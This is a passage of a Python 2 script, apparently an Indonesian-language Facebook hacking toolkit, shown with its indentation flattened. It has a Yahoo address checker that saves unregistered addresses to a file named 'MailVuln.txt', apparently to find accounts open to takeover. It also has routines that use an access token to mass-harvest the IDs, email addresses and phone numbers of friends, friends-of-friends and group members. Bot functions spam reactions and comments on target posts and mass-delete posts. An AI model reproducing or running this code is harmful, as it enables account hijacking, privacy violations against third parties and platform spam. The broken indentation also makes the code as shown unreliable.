print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail=open(files, 'r').readlines()
for pw in mail:
mail=pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo=re.compile('@.*')
otw=yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open(
'https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html=True
br.select_form(nr=0)
br['username']=mail
klik=br.submit().read()
jok=re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek=jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Ambil ID teman'
print '\x1b[1;37;40m2. Ambil ID teman dari teman'
print '\x1b[1;37;40m3. Ambil ID member GRUP'
print '\x1b[1;37;40m4. Ambil Email teman'
print '\x1b[1;37;40m5. Ambil Email teman dari teman'
print '\x1b[1;37;40m6. Ambil No HP teman'
print '\x1b[1;37;40m7. Ambil No HP teman dari teman'
print '\x1b[1;31;40m0. Back'
print
grab_select()
def grab_select():
cuih=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Jangan kosong'
grab_select()
else:
if cuih == '1':
id_teman()
else:
if cuih == '2':
idfrom_teman()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_teman()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_teman()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mThere is nothing'
grab_select()
def id_teman():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
r=requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
z=json.loads(r.text)
save_id=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz=open(save_id, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def idfrom_teman():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt=raw_input(
'\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok=requests.get('https://graph.facebook.com/' +
idt + '?access_token=' + toket)
op=json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r=requests.get('https://graph.facebook.com/' + idt +
'?fields=friends.limit(5000)&access_token=' + toket)
z=json.loads(r.text)
save_idt=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz=open(save_idt, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def id_member_grup():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r=requests.get(
'https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw=json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg=raw_input(
'\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b=open(simg, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
re=requests.get('https://graph.facebook.com/' + id +
'/members?fields=name,id&access_token=' + toket)
s=json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def email():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mails=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r=requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
a=json.loads(r.text)
mpsh=open(mails, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x=requests.get('https://graph.facebook.com/' +
i['id'] + '?access_token=' + toket)
z=json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def emailfrom_teman():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt=raw_input(
'\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok=requests.get('https://graph.facebook.com/' +
idt + '?access_token=' + toket)
op=json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r=requests.get('https://graph.facebook.com/' +
idt + '/friends?access_token=' + toket)
a=json.loads(r.text)
mpsh=open(mails, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x=requests.get('https://graph.facebook.com/' +
i['id'] + '?access_token=' + toket)
z=json.loads(x.text)
try:
emfromteman.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def nomor_hp():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
noms=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url='https://graph.facebook.com/me/friends?access_token=' + toket
r=requests.get(url)
z=json.loads(r.text)
no=open(noms, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x=requests.get('https://graph.facebook.com/' +
n['id'] + '?access_token=' + toket)
z=json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def hpfrom_teman():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt=raw_input(
'\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok=requests.get('https://graph.facebook.com/' +
idt + '?access_token=' + toket)
op=json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r=requests.get('https://graph.facebook.com/' +
idt + '/friends?access_token=' + toket)
a=json.loads(r.text)
no=open(noms, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x=requests.get('https://graph.facebook.com/' +
i['id'] + '?access_token=' + toket)
z=json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def menu_bot():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Bot Reactions Target Post'
print '\x1b[1;37;40m2. Bot Reactions Grup Post'
print '\x1b[1;37;40m3. Bot Komen Target Post'
print '\x1b[1;37;40m4. Bot Komen Grup Post'
print '\x1b[1;37;40m5. Mass delete Post'
print '\x1b[1;37;40m6. Terima permintaan pertemanan'
print '\x1b[1;37;40m7. Hapus pertemanan'
print '\x1b[1;31;40m0. Back'
print
bot_select()
def bot_select():
bots=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Jangan kosong'
bot_select()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mThere is nothing'
bot_select()
def menu_react():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Back'
print
react_select()
def react_select():
global tipe
aksi=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
react_select()
else:
if aksi == '1':
tipe='LIKE'
react()
else:
if aksi == '2':
tipe='LOVE'
react()
else:
if aksi == '3':
tipe='WOW'
react()
else:
if aksi == '4':
tipe='HAHA'
react()
else:
if aksi == '5':
tipe='SAD'
react()
else:
if aksi == '6':
tipe='ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mThere is nothing'
react_select()
def react():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit=raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh=requests.get('https://graph.facebook.com/' + ide +
'?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah=json.loads(oh.text)
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y=a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y +
'/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Back'
print
reactg_select()
def reactg_select():
global tipe
aksi=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
reactg_select()
else:
if aksi == '1':
tipe='LIKE'
reactg()
else:
if aksi == '2':
tipe='LOVE'
reactg()
else:
if aksi == '3':
tipe='WOW'
reactg()
else:
if aksi == '4':
tipe='HAHA'
reactg()
else:
if aksi == '5':
tipe='SAD'
reactg()
else:
if aksi == '6':
tipe='ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mThere is nothing'
reactg_select()
def reactg():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide=raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
limit=raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah=requests.get('https://graph.facebook.com/group/?id=' +
ide + '&access_token=' + toket)
asw=json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh=requests.get('https://graph.facebook.com/v3.0/' + ide +
'?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah=json.loads(oh.text)
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y=a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y +
'/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km=raw_input(
'\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit=raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km=km.replace('<>', '\n')
try:
p=requests.get('https://graph.facebook.com/' + ide +
'?fields=feed.limit(' + limit + ')&access_token=' + toket)
a=json.loads(p.text)
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f=s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f +
'/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
km=raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit=raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km=km.replace('<>', '\n')
try:
ah=requests.get(
'https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw=json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p=requests.get('https://graph.facebook.com/v3.0/' + ide +
'?fields=feed.limit(' + limit + ')&access_token=' + toket)
a=json.loads(p.text)
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f=s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f +
'/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
nam=requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol=json.loads(nam.text)
nama=lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
asu=requests.get(
'https://graph.facebook.com/me/feed?access_token=' + toket)
asus=json.loads(asu.text)
for p in asus['data']:
id=p['id']
piro=0
url=requests.get('https://graph.facebook.com/' + id +
'?method=delete&access_token=' + toket)
ok=json.loads(url.text)
try:
error=ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal'
